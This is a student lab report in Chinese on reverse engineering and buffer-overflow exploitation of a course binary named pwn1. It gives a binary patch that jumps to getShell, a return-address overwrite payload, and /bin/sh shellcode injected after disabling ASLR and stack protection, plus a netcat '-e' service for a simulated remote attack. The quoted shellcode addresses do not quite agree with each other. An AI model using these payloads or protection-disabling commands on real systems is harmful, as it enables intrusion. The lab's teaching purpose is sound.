exp1-逆向与bof基础实验报告

1 基础知识

1.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码

NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90），实验中我们构造滑行区就是用的这个机器命令x90。
JNE：条件转移指令，如果不相等则跳转。（机器码：75）
JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

1.2 掌握反汇编与十六进制编程器

反汇编主要用的命令是

objdump -d 目标文件 | more

十六进制编程器

进入vi/vim编辑器后按esc后输入:%!xxd将显示模式切换为16进制模式,编辑完成后按esc后输入:%!xxd -r将转换16进制为原格式

2 逆向及Bof基础实践说明

2.1 实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

• 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
• 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
• 注入一个自己制作的shellcode并运行这段shellcode。

这几种思路，基本代表现实情况中的攻击目标:

• 运行原本不可访问的代码片段
• 强行修改程序执行流
• 以及注入运行任意代码。

3 直接修改程序机器指令，改变程序执行流程

3.1 实验步骤

1.首先将pwn1文件下载并解压到虚拟机桌面的新建文件夹，并在终端里进行反汇编

objdump -d pwn1 | more

2.找到main函数并修改可执行文件的指令使其弹出shell

3.查看修改后的结果

objdump -d pwn2 | more

4.验证功能

./pwn2

3.2 原理分析

实践内容1为调用getshell函数，我们想让它调用getShell，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行。
804847d-80484ba的补码为c3ffffff。

"call 8048491"本来EIP的值应该是下条指令的地址，即80484ba，但e8指令为跳转，CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。

4 通过构造输入参数，造成BOF攻击，改变程序执行流

4.1 实验步骤

1.构造并验证输入参数

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input

2.运行验证

(cat input; cat) | ./pwn1

4.2 原理分析

1.通过gdb碰撞确定覆盖返回地址的位置

gdb pwn1
r
1111111122222222333333334444444455555555

2.验证eip覆盖的位置

(gdb下)
r
y
1111111122222222333333334444444412345678

通过观察可发现eip寄存器被“4321”覆盖，因此可以确定构造参数的第33字节到36字节会覆盖eip寄存器,因此只要将getshell的地址写入这四个字节就可以实现弹出shell

5 注入Shellcode并执行

5.1 实验步骤

1.换源

cd /etc/apt
vim sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

换源过程中，文件为只读文件，无法进行修改后保存，解决方法如下：
https://blog.csdn.net/m0_46161993/article/details/107190956
2.下载prelink压缩包并安装

3.设置栈可执行

execstack -s pwn1 

4.关闭地址随机化

echo "0" > /proc/sys/kernel/randomize_va_space

关闭地址随机化需在root用户下执行
5.构造shellcode并执行

perl -e 'print "A" x 32;print "\x00\xf1\xff\xbf\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
 
xxd input_shellcode
(cat input_shellcode; cat) | ./pwn1

前四个字节0xffffd0fc是Shellcode的位置

5.2shellcode地址

1.在终端1运行pwn1

(cat input_shellcode;cat) | ./pwn1

2.在终端2调试

ps -ef | grep pwn1
gdb
attach 39367
b *0x080484ae
c
info r esp

得到pwn1的进程号为39367，利用GDB调试foo函数，在其返回地址设置断点，查看栈顶指针的值，加0x4即为shellcode的地址，即为0xbffff0fc+0x4=0xbffff100,填入shellcode的前四字节

6 结合nc模拟远程攻击

6.1实验步骤

1.主机1，模拟一个有漏洞的网络服务

nc -l 127.0.0.1 -p 28234  -e ./pwn1

2.主机2，连接主机1并发送攻击载荷

(cat input_shellcode; cat) | nc 127.0.0.1 28234

实验的问题与收获

首先是对Linux系统的不熟悉，经常遇到不知道如何退出指令的情况，多数时候只能关闭终端重新打开，
最难的是在注入shellcode，从开头对shellcode完全不了解到后来看视频也只是朦胧不知所云，在实验过程中更是错误百出。
本次实验对我来说是新的挑战，在我们学习小组成员的帮助和讲解下完成度不算高的实现了本次实验的大部分内容，究其根本还是自主学习能力不够，所以在今后的课程实验中，我会努力提升自己的自学能力和探究精神，让自己在这门课的学习中收获更多。